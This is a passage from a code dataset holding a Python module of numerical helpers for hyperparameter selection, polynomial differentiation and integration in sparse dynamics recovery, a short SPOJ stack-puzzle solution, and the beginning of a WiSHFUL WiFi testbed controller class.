result_dict)\n result_dict[\"tid\"] = t[\"tid\"]\n result_dict.update(t[\"result\"])\n results_df = pd.concat(\n [results_df, pd.DataFrame(result_dict, index=[0])],\n axis=0,\n ignore_index=True,\n )\n results_df = results_df[results_df.status == \"ok\"]\n results_df = results_df.infer_objects()\n nrows = int(math.ceil((len(params) + 1) / kwargs[\"ncols\"]))\n if \"figsize\" not in kwargs.keys():\n kwargs[\"figsize\"] = (15, 5 * nrows)\n f, axs = plt.subplots(nrows=nrows, **kwargs)\n axs = trim_axs(axs, len(params) + 1)\n f.suptitle(\"Parameter Space tried by Hyperopt & Loss\")\n for ax, p in zip(axs, [*params, \"loss\"]):\n if p == \"loss\":\n sns.scatterplot(x=results_df.tid, y=results_df.loc[:, p], alpha=0.8, ax=ax)\n ax.set_title(\"Scatterplot of Loss vs trial number.\")\n elif dist_plots:\n if pd.api.types.is_bool_dtype(\n results_df.loc[:, p]\n ) or pd.api.types.is_string_dtype(results_df.loc[:, p]):\n sns.countplot(results_df.loc[:, p], ax=ax)\n else:\n sns.distplot(results_df.loc[:, p].astype(\"float\"), bins=10, ax=ax)\n ax.set_title(p)\n else:\n sns.scatterplot(x=results_df.loc[:, p], y=results_df.loss, alpha=0.8, ax=ax)\n ax.set_title(f\"{p} vs loss\")\n plt.show()\n return results_df\n\n\n# Select the parameter that minimizes the loss_function.\ndef regularization_selection(\n loss_function,\n type_algorithm,\n options,\n show_progress=False,\n skip_minimization_check=False,\n):\n if type_algorithm == \"brute\":\n x = np.linspace(options[\"min\"], options[\"max\"], options[\"number_evaluations\"])\n min_error = loss_function(x[0])\n min_regularization = x[0]\n error = [loss_function(x[0])]\n for i in range(1, options[\"number_evaluations\"]):\n error.append(loss_function(x[i]))\n if min_error > error[-1]:\n min_error = error[-1]\n min_regularization = x[i]\n if show_progress:\n import matplotlib.pyplot as plt\n\n plt.plot(x, error)\n plt.show()\n return min_regularization\n\n if type_algorithm == \"minimization\":\n from scipy.optimize import minimize_scalar\n\n reg = minimize_scalar(\n lambda x: loss_function(x),\n method=\"bounded\",\n bounds=(options[\"min\"], options[\"max\"]),\n options={\n \"xatol\": options[\"xatol\"],\n \"maxiter\": options[\"number_evaluations\"],\n },\n )\n if reg[\"success\"]:\n if skip_minimization_check:\n if show_progress:\n print(\n \"Final parameter selected: \",\n reg[\"x\"],\n \" Number of calls: \",\n reg,\n \" Max number calls: \",\n options[\"number_evaluations\"],\n )\n return reg[\"x\"]\n else:\n # Compare to the loss if we have zero regularization.\n if loss_function(reg[\"x\"]) <= loss_function(0.0):\n if show_progress:\n print(\n \"Final parameter selected: \",\n reg[\"x\"],\n \" Number of calls: \",\n reg,\n \" Max number calls: \",\n options[\"number_evaluations\"],\n )\n return reg[\"x\"]\n else:\n if show_progress:\n print(\n \"Final parameter selected: \",\n 0.0,\n \" Number of calls: \",\n reg,\n \" Max number calls: \",\n options[\"number_evaluations\"],\n )\n return 0.0\n else:\n return regularization_selection(loss_function, \"brute\", options)\n\n if type_algorithm == \"bayesian\":\n from hyperopt import fmin, hp, tpe, Trials\n from auxiliary_functions import plot_params_tried\n\n if options[\"distribution\"] == \"uniform\":\n trls = Trials()\n SPACE = {\n \"regularization\": hp.uniform(\n \"regularization\", options[\"min\"], options[\"max\"]\n )\n }\n reg = fmin(\n lambda x: loss_function(x[\"regularization\"]),\n space=SPACE,\n trials=trls,\n max_evals=options[\"number_evaluations\"],\n algo=tpe.suggest,\n show_progressbar=False,\n )\n print(\"Regularization parameter: \", reg[\"regularization\"])\n if show_progress:\n plot_params_tried(SPACE, trls, dist_plots=True)\n if skip_minimization_check:\n return reg[\"regularization\"]\n else:\n if loss_function(reg[\"regularization\"]) <= loss_function(\n options[\"max\"]\n ):\n return reg[\"regularization\"]\n else:\n return options[\"max\"]\n\n if options[\"distribution\"] == \"log-uniform\":\n trls = Trials()\n SPACE = {\n \"regularization\": hp.loguniform(\n \"regularization\", options[\"min\"], options[\"max\"]\n )\n }\n reg = fmin(\n lambda x: loss_function(x[\"regularization\"]),\n space=SPACE,\n trials=trls,\n max_evals=options[\"number_evaluations\"],\n algo=tpe.suggest,\n show_progressbar=False,\n )\n if show_progress:\n plot_params_tried(SPACE, trls, dist_plots=True)\n return reg[\"regularization\"]\n # return np.log(reg['regularization'])\n\n if options[\"distribution\"] == \"log-normal\":\n trls = Trials()\n SPACE = {\n \"regularization\": hp.lognormal(\n \"regularization\", options[\"mean\"], options[\"sigma\"]\n )\n }\n reg = fmin(\n lambda x: loss_function(x[\"regularization\"]),\n space=SPACE,\n trials=trls,\n max_evals=options[\"number_evaluations\"],\n algo=tpe.suggest,\n show_progressbar=False,\n )\n if show_progress:\n plot_params_tried(SPACE, trls, dist_plots=True)\n return reg[\"regularization\"]\n # return np.log(reg['regularization'])\n assert False, \"Type of algorithm selected is incorrect\"\n\n\ndef load_pickled_object(filepath):\n with open(filepath, \"rb\") as f:\n loaded_object = pickle.load(f)\n return loaded_object\n\n\ndef dump_pickled_object(filepath, target_object):\n with open(filepath, \"wb\") as f:\n pickle.dump(target_object, f)\n\n\n# Defines the type of maximum vertex dot product that we'll return.\ndef max_vertex(grad, activeVertex):\n # See which extreme point in the active set gives greater inner product.\n maxProd = activeVertex[0].T.dot(grad)\n maxInd = 0\n for i in range(len(activeVertex)):\n aux = activeVertex[i].T.dot(grad)\n if aux > maxProd:\n maxProd = aux\n maxInd = i\n return activeVertex[maxInd], maxInd\n\n\n# Finds the step with the maximum and minimum inner product.\ndef max_min_vertex(grad, activeVertex):\n # See which extreme point in the active set gives greater inner product.\n maxProd = np.dot(activeVertex[0], grad)\n minProd = np.dot(activeVertex[0], grad)\n maxInd = 0\n minInd = 0\n for i in range(len(activeVertex)):\n if np.dot(activeVertex[i], grad) > maxProd:\n maxProd = np.dot(activeVertex[i], grad)\n maxInd = i\n else:\n if np.dot(activeVertex[i], grad) < minProd:\n minProd = np.dot(activeVertex[i], grad)\n minInd = i\n return activeVertex[maxInd], maxInd, activeVertex[minInd], minInd\n\n\ndef new_vertex_fail_fast(x, extremePoints):\n for i in range(len(extremePoints)):\n # Compare succesive indices.\n for j in range(len(extremePoints[i])):\n if extremePoints[i][j] != x[j]:\n break\n if j == len(extremePoints[i]) - 1:\n return False, i\n return True, np.nan\n\n\n# Finds if x is already in the extremePoint list.\n# Returns True if vertex is new, otherwise false and the index.\ndef check_new_vertex(vertex, active_set):\n for i in range(len(active_set)):\n if np.array_equal(active_set[i], vertex):\n return False, i\n return True, np.nan\n\n\n# Deletes the extremepoint from the representation.\ndef delete_vertex_index(index, extremePoints, weights):\n del extremePoints[index]\n del weights[index]\n return\n\n\n# Sort projection for the simplex.\ndef projection_simplex_sort(x, s=1):\n assert s > 0, \"Radius s must be strictly positive (%d <= 0)\" % s\n (n,) = x.shape # will raise ValueError if v is not 1-D\n if x.sum() == s and np.alltrue(x >= 0):\n return x\n v = x - np.max(x)\n u = np.sort(v)[::-1]\n cssv = np.cumsum(u)\n rho = np.count_nonzero(u * np.arange(1, n + 1) > (cssv - s)) - 1\n theta = float(cssv[rho] - s) / (rho + 1)\n w = (v - theta).clip(min=0)\n return w\n\n\n# Pick a stepsize.\ndef step_size(function, d, grad, x, typeStep=\"EL\", maxStep=None):\n if typeStep == \"Armijo\":\n from scipy.optimize.linesearch import line_search_armijo\n\n alpha, fc, phi1 = line_search_armijo(\n function.f, x.flatten(), d.flatten(), grad.flatten(), function.f(x)\n )\n return alpha\n if typeStep == \"SS\":\n return -np.dot(grad, d) / (function.largest_eigenvalue() * np.dot(d, d))\n else:\n if typeStep == \"GS\":\n options = {\"xatol\": 1e-08, \"maxiter\": 500000, \"disp\": 0}\n\n def InnerFunction(t): # Hidden from outer code\n return function.f(x + t * d)\n\n if maxStep is None:\n res = minimize_scalar(\n InnerFunction, bounds=(0, 1), method=\"bounded\", options=options\n )\n else:\n res = minimize_scalar(\n InnerFunction,\n bounds=(0, maxStep),\n method=\"bounded\",\n options=options,\n )\n return res.x\n else:\n if maxStep is None:\n return function.line_search(grad, d, x, maxStep=1.0)\n else:\n return function.line_search(grad, d, x, maxStep=maxStep)\n\n\n# Once the problem has been solved to a high accuracy, solve the problem.\ndef exportsolution(filepath, formatString, fOpt, xOpt, tolerance, size):\n with open(filepath, \"wb\") as f:\n np.savetxt(f, [np.array(formatString)], fmt=\"%s\", delimiter=\",\")\n np.savetxt(f, np.array([fOpt]), fmt=\"%.15f\")\n np.savetxt(f, [xOpt.T], fmt=\"%.11f\", delimiter=\",\")\n np.savetxt(f, np.array([tolerance]), fmt=\"%.15f\")\n np.savetxt(f, np.array([size]), fmt=\"%.15f\")\n return\n\n\n# Once the problem has been solved to a high accuracy, solve the problem.\ndef importSolution(filepath):\n with open(filepath) as f:\n _ = f.readline()\n fOpt = float(f.readline().rstrip())\n xOpt = np.asarray(f.readline().rstrip().split(\",\")).astype(float)\n tolerance = float(f.readline().rstrip())\n size = int(float(f.readline().rstrip()))\n return fOpt, xOpt, tolerance, size\n\n\ndef evaluate_polynomial_backup(X, polinomial):\n Psi = polinomial.fit_transform(X.T).T\n return Psi, Psi.shape[0]\n\n\ndef evaluate_polynomial(X, polinomial):\n Psi = polinomial.fit_transform(X.T).T\n return Psi\n\n\ndef polynomial_differentiation(u, x, deg=3, diff=1, width=5):\n\n \"\"\"\n u = values of some function\n x = x-coordinates where values are known\n deg = degree of polynomial to use\n diff = maximum order derivative we want\n width = width of window to fit to polynomial\n\n This throws out the data close to the edges since the polynomial derivative only works\n well when we're looking at the middle of the points fit.\n \"\"\"\n\n u = u.flatten()\n x = x.flatten()\n\n n = len(x)\n du = np.zeros((n - 2 * width, diff))\n\n # Take the derivatives in the center of the domain\n for j in range(width, n - width):\n\n points = np.arange(j - width, j + width)\n\n # Fit to a Chebyshev polynomial\n # this is the same as any polynomial since we're on a fixed grid but it's better conditioned :)\n poly = np.polynomial.chebyshev.Chebyshev.fit(x[points], u[points], deg)\n\n # Take derivatives\n for d in range(1, diff + 1):\n du[j - width, d - 1] = poly.deriv(m=d)(x[j])\n return du\n\n\ndef polynomial_integration(u, x, deg=4, diff=1, width=5):\n\n \"\"\"\n u = values of some function\n x = x-coordinates where values are known\n deg = degree of polynomial to use\n diff = maximum order derivative we want\n width = width of window to fit to polynomial\n\n This throws out the data close to the edges since the polynomial derivative only works\n well when we're looking at the middle of the points fit.\n \"\"\"\n\n u = u.flatten()\n x = x.flatten()\n\n n = len(x)\n du = np.zeros((n - 2 * width, diff))\n\n # Take the derivatives in the center of the domain\n for j in range(width, n - width):\n\n points = np.arange(j - width, j + width)\n\n # Fit to a Chebyshev polynomial\n # this is the same as any polynomial since we're on a fixed grid but it's better conditioned :)\n poly = np.polynomial.chebyshev.Chebyshev.fit(x[points], u[points], deg)\n\n # Create integral polynomial\n integral_poly = poly.integ()\n # Computes integral between x[j-1] and x[j]\n for d in range(1, diff + 1):\n du[j - width, d - 1] = integral_poly(x[j]) - integral_poly(x[j - 1])\n return np.cumsum(du)\n\n\ndef derivative(X, time, method=\"poly\", deg=2, diff=1, width=5):\n if method == \"poly\":\n dim, num_samples = X.shape\n derivative = np.zeros((dim, int(num_samples - 2.0 * width)))\n if diff == 2:\n second_derivative = np.zeros((dim, int(num_samples - 2.0 * width)))\n for i in range(dim):\n if diff == 1:\n derivative[i] = polynomial_differentiation(\n X[i], time, deg, diff, width\n ).squeeze()\n else:\n if diff == 2:\n val = polynomial_differentiation(X[i], time, deg, diff, width)\n derivative[i] = val[:, 0].squeeze()\n second_derivative[i] = val[:, 1].squeeze()\n else:\n assert (\n False\n ), \"Have only built infrastructure to handle first and second derivative.\"\n if diff == 1:\n return derivative, X[:, width:-width], time[width:-width]\n if diff == 2:\n # print(len(time[width:-width]), len(time))\n # quit()\n return derivative, second_derivative, X[:, width:-width], time[width:-width]\n if method == \"central\":\n # deriv = np.gradient(X, time, axis = 1)\n if diff == 1:\n return (\n (X[:, 2:] - X[:, :-2]) / (time[2:] - time[:-2]),\n X[:, 1:-1],\n time[1:-1],\n )\n if diff == 2:\n return (\n (X[:, 2:] - X[:, :-2]) / (time[2:] - time[:-2]),\n (X[:, 2:] - 2.0 * X[:, 1:-1] + X[:, :-2])\n / np.square(0.5 * (time[2:] - time[:-2])),\n X[:, 1:-1],\n time[1:-1],\n )\n if method == \"forward\":\n return np.diff(X, axis=1) / np.diff(time)[None, :], X[:, :-1], time[1:]\n\n\ndef derivative_from_list(list_X, list_time, method=\"poly\", deg=2, diff=1, width=5):\n assert diff == 1 or diff == 2, \"Order of differentiation not implemented.\"\n list_Y = []\n list_first_deriv = []\n list_X_updated = []\n list_time_updated = []\n for i in range(len(list_X)):\n if diff == 1:\n Y, X, t = derivative(\n list_X[i], list_time[i], method=method, deg=deg, diff=diff, width=width\n )\n if diff == 2:\n first_deriv, Y, X, t = derivative(\n list_X[i], list_time[i], method=method, deg=deg, diff=diff, width=width\n )\n list_first_deriv.append(first_deriv)\n list_Y.append(Y)\n list_X_updated.append(X)\n list_time_updated.append(t)\n if diff == 1:\n return list_Y, list_X_updated, list_time_updated\n else:\n return list_Y, list_first_deriv, list_X_updated, list_time_updated\n\n\ndef compute_integral_formulation_matrix(\n list_Psi,\n list_X,\n list_t,\n polinomial,\n type_of_integration=\"Simpsons\",\n width=5,\n order=3,\n):\n\n list_matrix = []\n list_delta = []\n for psi_val, x_val, t_val in zip(list_Psi, list_X, list_t):\n mat, x_values = cumulative_integration(\n psi_val,\n x_val,\n t_val,\n type_integration=type_of_integration,\n width=width,\n order=order,\n )\n list_matrix.append(mat)\n list_delta.append(x_values)\n return list_delta, list_matrix\n\n\ndef compute_exact_kuramoto_integral_formulation_matrix(\n list_X,\n list_t,\n intrinsic_frequencies,\n polinomial,\n num_basis_functions,\n number_of_samples=1000,\n):\n from dynamics import kuramoto_time_individual\n from scipy import integrate\n\n list_exact = []\n for k in range(len(list_t)):\n matrix = np.zeros((num_basis_functions, int(len(list_t[k]) - 1)))\n # First interval.\n for l in range(1, len(list_t[k])):\n position, time_stamp = kuramoto_time_individual(\n intrinsic_frequencies,\n list_X[k][:, l - 1],\n list_t[k][l - 1],\n list_t[k][l],\n number_of_samples,\n )\n position_sine_cosines = np.vstack((np.cos(position), np.sin(position)))\n psi_evaluation = evaluate_polynomial(position_sine_cosines, polinomial)\n matrix[:, l - 1] = integrate.simps(psi_evaluation, time_stamp)\n list_exact.append(np.cumsum(matrix, axis=1))\n return list_exact\n\n\ndef compute_exact_FPUT_integral_formulation_matrix(\n list_X,\n list_t,\n exact_solution,\n polinomial,\n num_basis_functions,\n number_of_samples=1000,\n):\n from dynamics import fermi_pasta_ulam_time_individual\n from scipy import integrate\n\n # Assume the initial velocities are zero\n list_exact = []\n for k in range(len(list_t)):\n matrix = np.zeros((num_basis_functions, int(len(list_t[k]) - 1)))\n # First interval.\n for l in range(1, len(list_t[k])):\n position, time_stamp = fermi_pasta_ulam_time_individual(\n exact_solution,\n polinomial,\n list_X[k][:, l - 1],\n list_t[k][l - 1],\n list_t[k][l],\n number_of_samples,\n )\n psi_evaluation = evaluate_polynomial(position, polinomial)\n matrix[:, l - 1] = integrate.simps(psi_evaluation, time_stamp)\n list_exact.append(np.cumsum(matrix, axis=1))\n return list_exact\n\n\ndef compute_exact_FPUT_integral_formulation_matrix_correct(\n list_X,\n list_first_deriv,\n list_t,\n exact_solution,\n polinomial,\n num_basis_functions,\n number_of_samples=1000,\n):\n from dynamics import fermi_pasta_ulam_time_individual_correct\n from scipy import integrate\n\n list_exact = []\n for k in range(len(list_t)):\n matrix = np.zeros((num_basis_functions, int(len(list_t[k]) - 1)))\n for l in range(1, len(list_t[k])):\n (\n position,\n velocity_matrix,\n time_stamp,\n ) = fermi_pasta_ulam_time_individual_correct(\n exact_solution,\n polinomial,\n list_X[k][:, l - 1],\n list_first_deriv[k][:, l - 1],\n list_t[k][l - 1],\n list_t[k][l],\n number_of_samples,\n )\n psi_evaluation = evaluate_polynomial(position, polinomial)\n matrix[:, l - 1] = integrate.simps(psi_evaluation, time_stamp)\n list_exact.append(np.cumsum(matrix, axis=1))\n return list_exact\n\n\n# Compute the cumulative integral of Psi in terms of t.\ndef cumulative_integration(Psi, x, t, type_integration=\"Simpsons\", width=5, order=3):\n assert (\n type_integration == \"Simpsons\"\n or type_integration == \"Trapezoid\"\n or type_integration == \"Poly\"\n ), \"Wrong integration rule.\"\n from scipy import integrate\n\n if type_integration == \"Simpsons\":\n x_output = (x - x[:, 0][:, np.newaxis])[:, 1:]\n num_basis_functions, number_of_samples = Psi.shape\n matrix = np.zeros((num_basis_functions, number_of_samples))\n for i in range(num_basis_functions):\n for j in range(0, number_of_samples):\n matrix[i, j] = integrate.simps(Psi[i, : j + 1], t[: j + 1])\n matrix = matrix[:, 1:]\n if type_integration == \"Trapezoid\":\n x_output = (x - x[:, 0][:, np.newaxis])[:, 1:]\n matrix = integrate.cumtrapz(Psi, t)\n if type_integration == \"Poly\":\n x_output = x[:, width:-width] - x[:, width - 1][:, np.newaxis]\n num_basis_functions, number_of_samples = Psi.shape\n matrix = np.zeros((num_basis_functions, int(number_of_samples - 2 * width)))\n for i in range(num_basis_functions):\n matrix[i, :] = polynomial_integration(Psi[i, :], t, deg=order, width=width)\n return matrix, x_output\n\n\ndef training_testing_validation_split(\n Psi, Y, proportion_train_data=0.7, proportion_testing_data=0.2\n):\n from sklearn.model_selection import train_test_split\n\n # Split into training and auxiliary\n Psi_train, Psi_aux, Y_train, Y_aux = train_test_split(\n Psi.T, Y.T, test_size=1.0 - proportion_train_data\n )\n Psi_validation, Psi_test, Y_validation, Y_test = train_test_split(\n Psi_aux,\n Y_aux,\n test_size=1 - proportion_testing_data / (1.0 - proportion_train_data),\n )\n return (\n Psi_train.T,\n Y_train.T,\n Psi_validation.T,\n Y_validation.T,\n Psi_test.T,\n Y_test.T,\n )\n\n\n# Given a dynamic, test how closely it resembles the testing data.\nclass testing_function:\n def __init__(\n self, Psi_test, Y_test, l0_penalty, exact_dynamic, normalization_factors\n ):\n self.Psi_test = Psi_test.copy()\n self.Y_test = Y_test.copy()\n self.l0_penalty = l0_penalty\n self.num_basis, self.num_samples = self.Psi_test.shape\n self.dimension, _ = Y_test.shape\n self.exact_dynamic = exact_dynamic.copy()\n self.normalization_factors = normalization_factors\n return\n\n def evaluate(self, dynamic):\n from scipy.sparse import isspmatrix_csr\n\n if isspmatrix_csr(dynamic):\n penalty = self.l0_penalty * dynamic.count_nonzero()\n else:\n penalty = self.l0_penalty * np.count_nonzero(dynamic)\n if dynamic.shape != self.exact_dynamic.shape:\n aux = dynamic.reshape(self.dimension, self.num_basis)\n return np.linalg.norm(aux.dot(self.Psi_test) - self.Y_test) + penalty\n else:\n return np.linalg.norm(dynamic.dot(self.Psi_test) - self.Y_test) + penalty\n\n def compare_exact_backup(self, dynamic):\n if dynamic.shape != self.exact_dynamic.shape:\n return np.linalg.norm(\n self.exact_dynamic - dynamic.reshape(self.exact_dynamic.shape)\n )\n else:\n return np.linalg.norm(self.exact_dynamic - dynamic)\n\n def compare_exact(self, dynamic):\n unnormalized = (\n dynamic.reshape(self.exact_dynamic.shape).T / self.normalization_factors\n ).T\n return np.linalg.norm(self.exact_dynamic - unnormalized)\n\n def return_Psi(self):\n return self.Psi_test\n\n def return_Y(self):\n return self.Y_test\n\n# Given a dynamic, test how closely it resembles the testing data.\nclass testing_function_simplex:\n def __init__(\n self, Psi_test, Y_test, l0_penalty, exact_dynamic, normalization_factors\n ):\n self.Psi_test = Psi_test.copy()\n self.Y_test = Y_test.copy()\n self.l0_penalty = l0_penalty\n self.num_basis, self.num_samples = self.Psi_test.shape\n self.dimension, _ = Y_test.shape\n self.exact_dynamic = exact_dynamic.copy()\n self.normalization_factors = normalization_factors\n return\n\n def evaluate(self, dynamic):\n from scipy.sparse import isspmatrix_csr\n\n dynamic = dynamic[:len(dynamic)//2] - dynamic[len(dynamic)//2:]\n\n if isspmatrix_csr(dynamic):\n penalty = self.l0_penalty * dynamic.count_nonzero()\n else:\n penalty = self.l0_penalty * np.count_nonzero(dynamic)\n if dynamic.shape != self.exact_dynamic.shape:\n aux = dynamic.reshape(self.dimension, self.num_basis)\n return np.linalg.norm(aux.dot(self.Psi_test) - self.Y_test) + penalty\n else:\n return np.linalg.norm(dynamic.dot(self.Psi_test) - self.Y_test) + penalty\n\n def compare_exact_backup(self, dynamic):\n dynamic = dynamic[:len(dynamic)//2] - dynamic[len(dynamic)//2:]\n \n if dynamic.shape != self.exact_dynamic.shape:\n return np.linalg.norm(\n self.exact_dynamic - dynamic.reshape(self.exact_dynamic.shape)\n )\n else:\n return np.linalg.norm(self.exact_dynamic - dynamic)\n\n def compare_exact(self, dynamic):\n dynamic = dynamic[:len(dynamic)//2] - dynamic[len(dynamic)//2:]\n unnormalized = (\n dynamic.reshape(self.exact_dynamic.shape).T / self.normalization_factors\n ).T\n return np.linalg.norm(self.exact_dynamic - unnormalized)\n\n def return_Psi(self):\n return self.Psi_test\n\n def return_Y(self):\n return self.Y_test\n\ndef polish_solution(\n Psi,\n y,\n active_set,\n barycentric_coordinates,\n tolerance=1.0e-10,\n threshold=0.0,\n type_criterion=\"FW\",\n time_limit=60.0,\n max_steps=100,\n):\n num_basis_functions = Psi.shape[0]\n dimension = y.shape[0]\n\n from scipy.sparse import csr_matrix\n from scipy.sparse import vstack\n matrix = csr_matrix(\n active_set[0].reshape((dimension, num_basis_functions)).dot(Psi).flatten()\n )\n for i in range(1, len(active_set)):\n matrix = vstack(\n (\n matrix,\n csr_matrix(\n active_set[i]\n .reshape((dimension, num_basis_functions))\n .dot(Psi)\n .flatten()\n ),\n )\n )\n\n quadratic = matrix.dot(matrix.T)\n linear = -matrix.dot(y.flatten())\n \n # print(quadratic)\n # print(linear)\n\n \n # Create objective function and feasible region.\n from feasible_regions import probability_simplex\n from functions import solution_polishing\n feas_reg = probability_simplex(len(active_set))\n fun_polishing = solution_polishing(quadratic, linear)\n from CINDy_algorithm import accelerated_projected_gradient_descent\n\n (\n x,\n polished_barycentric_coordinates,\n gap_values1,\n ) = accelerated_projected_gradient_descent(\n fun_polishing,\n feas_reg,\n active_set,\n tolerance,\n barycentric_coordinates,\n time_limit=time_limit,\n type_criterion=type_criterion,\n max_iteration=max_steps,\n )\n # return x, active_set, polished_barycentric_coordinates\n return remove_vertives(active_set, polished_barycentric_coordinates, threshold)\n\n\ndef remove_vertives(active_set, barycentric_coordinates, threshold):\n new_active_set = []\n new_barycentric_coordinates = []\n # print(barycentric_coordinates)\n for i in range(len(active_set)):\n if barycentric_coordinates[i] > threshold:\n new_active_set.append(active_set[i])\n new_barycentric_coordinates.append(barycentric_coordinates[i])\n aux = sum(new_barycentric_coordinates)\n new_barycentric_coordinates = [\n x + (1.0 - aux) / len(new_barycentric_coordinates)\n for x in new_barycentric_coordinates\n ]\n x = np.zeros(active_set[0].shape)\n for i in range(len(new_active_set)):\n x += new_barycentric_coordinates[i] * new_active_set[i]\n # print(x[np.where(x != 0.0)], np.where(x != 0.0), new_barycentric_coordinates)\n \n return x, new_active_set, new_barycentric_coordinates\n\n\n# Given a dynamic, test how closely it resembles the testing data.\nclass normalization_and_recovery:\n def __init__(self, X):\n self.normalization_factors = np.linalg.norm(X, axis=1)[:, None]\n self.num_basis_functions = X.shape[0]\n return\n\n # Divide each collection of samples by the norm of the samples.\n def normalize(self, X):\n return X / self.normalization_factors\n\n def unnormalize(self, X):\n return X * self.normalization_factors\n\n def return_normalization_factors(self):\n return self.normalization_factors\n\n # Divide each collection of samples by the norm of the samples.\n def recover_solution(self, Sol):\n if Sol.ndim == 2 and Sol.shape[1] == self.num_basis_functions:\n return (Sol.T / self.normalization_factors).T\n else:\n dimension = int(Sol.shape[0] / self.num_basis_functions)\n return (\n Sol.reshape(dimension, self.num_basis_functions).T\n / self.normalization_factors\n ).T\n\n # Divide each collection of samples by the norm of the samples.\n def unnormalize_solution(self, Sol):\n if Sol.ndim == 2 and Sol.shape[1] == self.num_basis_functions:\n return (Sol.T * self.normalization_factors).T\n else:\n dimension = int(Sol.shape[0] / self.num_basis_functions)\n return (\n Sol.reshape(dimension, self.num_basis_functions).T\n * self.normalization_factors\n ).T\n\n\n# Divide each collection of samples by the norm of the samples.\ndef normalize_data(X):\n return X / np.linalg.norm(X, axis=1)[:, None]\n\n\n# Divide each collection of samples by the norm of the samples.\ndef transform_solution(Sol, X):\n return (Sol.T * np.linalg.norm(X, axis=1)[:, None]).T\n\n\ndef repeat_along_diag(a, r):\n m, n = a.shape\n out = np.zeros((r, m, r, n), dtype=a.dtype)\n diag = np.einsum(\"ijik->ijk\", out)\n diag[:] = a\n return out.reshape(-1, n * r)\n","sub_path":"auxiliary_functions.py","file_name":"auxiliary_functions.py","file_ext":"py","file_size_in_byte":40306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"542567402","text":"# https://www.spoj.com/problems/STPAR/\n\ndef street_parade(l):\n stack=[]\n new_line=[]\n index=1\n for truck in l:\n if truck!=index:\n if len(stack)!=0:\n for j in range(len(stack)):\n if stack[-1]==index:\n new_line.append(stack[-1])\n stack.pop()\n index+=1\n else:\n break\n if truck==index:\n new_line.append(truck)\n index+=1\n else:\n stack.append(truck)\n else:\n stack.append(truck)\n else:\n new_line.append(truck)\n index+=1\n #print(stack)\n for i in range(len(stack)):\n new_line.append(stack[-1])\n stack.pop()\n #print (new_line)\n if new_line == sorted(l):\n print (\"yes\")\n else:\n print (\"no\")\n \ncont=True\nwhile cont:\n n = int(input())\n if n == 0:\n cont=False\n break\n l = [int(x) for x in input().split()]\n street_parade(l)","sub_path":"SPOJ/street_parade.py","file_name":"street_parade.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"269307582","text":"#!/usr/bin/python\n__author__ = 'Pierluigi Gallo'\n\"\"\"\nEU project WISHFUL\n\"\"\"\n# from upis.upi_rn import UPI_RN\n# from upis.upi_m import UPI_M\n# from upis.upi_rn import UPI_RN\n#\n# from common.upihelper import from_unix_time, unix_time_as_tuple, get_now_full_second\n# from helpers.application import ServerApplication, ClientApplication\n# from helpers.mac_layer import EdcaQueueParameters\n# from common.upihelper import Time\nfrom controller.wishful_controller.node_manager import *\n# from helpers.helper import NetworkFunctionHelper\n# from helpers.helper import NetworkHelper, RadioHelper\n# from functools import partial\nfrom datetime import date, datetime, timedelta\nimport re\nimport time\nimport sys\nimport csv\n\nclass WiFiNode(Node):\n \"\"\"\n This class defines an WiFi node and takes the most appropriate actions in order to :\n Set wireless lan interface ip address and network role (Station/AccessPoint)\n Stores/Removes low level measurements\n Store the low level measurements type\n \"\"\"\n def __init__(self, node):\n \"\"\" Creates a new WiFiNode\n \"\"\"\n super( WiFiNode, self ).__init__(node)\n eth_ipAddress_part = re.split(r'[:./\\s]\\s*', str(node))\n self.wlan_ipAddress = '192.168.3.' + eth_ipAddress_part[3]\n self.last_bunch_measurement = []\n self.measurement_types = []\n self.role = None\n self.platform = None\n\n def add_measure(self, measure):\n \"\"\" Adds a measure or a list of measurable in the list of node measurement\n :param measure: list of measure to add at last_bunch_measurement object attribute\n \"\"\"\n self.last_bunch_measurement.append(measure)\n\n def get_available_measures(self):\n \"\"\" Gets the available measure of the node\n :return measure_list: the list of measure stored until now\n \"\"\"\n return self.last_bunch_measurement\n\n\nclass TestbedTopology:\n \"\"\"\n This class defines an experiment controller and takes the most appropriate actions in order to :\n Create the WiFiNode and Nodelist\n Setup the nodes roles (AP/STA)\n Setup the wireless network (Network create and station association)\n Managing the interface with WiSHFUL controller\n \"\"\"\n\n def __init__(self, testbed_name, log):\n \"\"\" create a new testbed topology whose nodes belong to the same group\n \"\"\"\n # name of the experiment group; only nodes of this group can be controlled\n self.exp_group_name=testbed_name\n self.log = log\n\n #used to save specific information for WiFi node\n self.wifi_ap_wmp_nodes = []\n self.wifinodes = [] #\n self.athnodes = [] #\n\n #used to run UPI function on node\n self.nodes = [] #\n self.ap_wmp_nodes = [] #\n self.wmp_nodes = [] #\n self.ath_nodes = [] #\n\n #used to save the total number of node present in the experiment\n self.experiment_nodes_number = 0\n self.wmp_nodes_number = 0\n self.ath_nodes_number = 0\n\n def setExperimentNodesNumber(self, nodes_number):\n # for ttilab testbed\n # 1 10.163.8.26 alix2 AP\n # 2 10.163.8.44 alix5 STA1\n # 3 10.163.8.57 alix7 STA2\n # 4 10.163.8.60 alix10 STA3\n # 5 10.163.8.69 alix11 STA4\n # 6 10.163.8.70 alix12 STA5\n # 7 10.163.8.71 alix13 STA6\n self.experiment_nodes_number = nodes_number\n return\n\n def getExperimentNodesNumber(self):\n return self.experiment_nodes_number\n\n\n def add_wmp_node(self, node, role):\n if role == 'AP':\n self.ap_wmp_nodes.append(node)\n elif role == 'STA':\n self.wmp_nodes.append(node)\n else:\n self.log.error('Error in node role : %s' % role)\n\n\n def setAP(self, node, essid):\n \"\"\" Creates infrastructure BSS, uses node such as Access Point\n :param node: elected Access Point Node\n :param essid: the SSID\n \"\"\"\n # UPI_R function is execute immediately\n exec_time = None\n\n # eth_ipAddress_part = re.split(r'[:./\\s]\\s*', str(node))\n # wlan_ipAddress = '192.168.3.' + eth_ipAddress_part[6]\n # UPIfunc = UPI_M.initTest\n # UPIargs = {'interface' : 'wlan0', 'operation' : ['create-network'], 'ssid' : [essid], 'ip_address' : [wlan_ipAddress] }\n # try:\n # rvalue = self.global_mgr.runAt(node, UPIfunc, UPIargs, exec_time)\n # self.log.info('Ret value of blocking call is %s' % str(rvalue))\n # except Exception as e:\n # self.log.fatal(\"An error occurred : %s\" % e)\n # return False\n\n def setSTA(self, node, essid):\n \"\"\" Associate node to 